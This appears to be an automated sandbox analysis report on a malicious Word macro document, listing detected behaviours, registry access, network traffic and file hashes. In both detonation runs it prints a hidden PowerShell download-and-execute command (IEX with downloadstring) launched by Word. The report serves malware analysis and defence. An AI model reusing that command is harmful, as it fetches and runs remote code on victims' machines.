Analysis Overview
SHA256
9cc036b0879d125d24401d0a89743fe5ace701dd6e107ea700f4adddb0238315
Threat Level: Known bad
The file 9cc036b0879d125d24401d0a89743fe5ace701dd6e107ea700f4adddb0238315 was found to be: Known bad.
Malicious Activity Summary
Process spawned unexpected child process
Command and Scripting Interpreter: PowerShell
Office macro that triggers on suspicious action
Suspicious Office macro
Drops file in Windows directory
System Location Discovery: System Language Discovery
Office loads VBA resources, possible macro or embedded object present
Suspicious use of SetWindowsHookEx
Suspicious behavior: AddClipboardFormatListener
Checks processor information in registry
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-03 21:08
Signatures
Office macro that triggers on suspicious action
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious Office macro
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-03 21:08
Reported
2024-11-03 21:11
Platform
win7-20240903-en
Max time kernel
119s
Max time network
122s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Office loads VBA resources, possible macro or embedded object present
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9cc036b0879d125d24401d0a89743fe5ace701dd6e107ea700f4adddb0238315.doc"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -w hidden -noninteractive "IEX((new-object net.webclient).downloadstring('http://127.0.0.1:8000/arquivos/windows.txt'))"
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
Network
| Country | Destination | Domain | Proto |
| N/A | 127.0.0.1:8000 | N/A | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-03 21:08
Reported
2024-11-03 21:11
Platform
win10v2004-20241007-en
Max time kernel
139s
Max time network
143s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 620 wrote to memory of 1364 | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 620 wrote to memory of 1364 | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9cc036b0879d125d24401d0a89743fe5ace701dd6e107ea700f4adddb0238315.doc" /o ""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -w hidden -noninteractive "IEX((new-object net.webclient).downloadstring('http://127.0.0.1:8000/arquivos/windows.txt'))"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.160.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.76.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| FR | 52.109.68.129:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 129.68.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| N/A | 127.0.0.1:8000 | N/A | tcp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | metadata.templates.cdn.office.net | udp |
| US | 95.100.195.47:443 | metadata.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | binaries.templates.cdn.office.net | udp |
| GB | 2.20.12.74:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.20.12.74:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.20.12.74:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.20.12.74:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.20.12.74:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.20.12.74:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.20.12.74:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.20.12.74:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.20.12.74:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.20.12.74:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.20.12.74:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.20.12.74:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.20.12.74:443 | binaries.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | 47.195.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vbewux1h.jou.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
| MD5 | d29962abc88624befc0135579ae485ec |
| SHA1 | e40a6458296ec6a2427bcb280572d023a9862b31 |
| SHA256 | a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866 |
| SHA512 | 4311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
| MD5 | 61b343870852ccc0e70c8d8c3bb4cc8c |
| SHA1 | c0dcaee03722a93eab2fcfd618392bb33b5c84df |
| SHA256 | 3869ac37373af3706ac20ffa74d1de3a9bf15af52e7e9cb0a2374fca22cdc261 |
| SHA512 | 1045cc8cf850a807ab9539e714cdeb7750b8da5751d40a634934845aec2094069a8a1c43c888c401424733b43c6d8227d2f7f478b9bdd79bf668ee3891f28b2f |
C:\Users\Admin\AppData\Local\Temp\TCDEFB4.tmp\gb.xsl
| MD5 | 51d32ee5bc7ab811041f799652d26e04 |
| SHA1 | 412193006aa3ef19e0a57e16acf86b830993024a |
| SHA256 | 6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97 |
| SHA512 | 5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810 |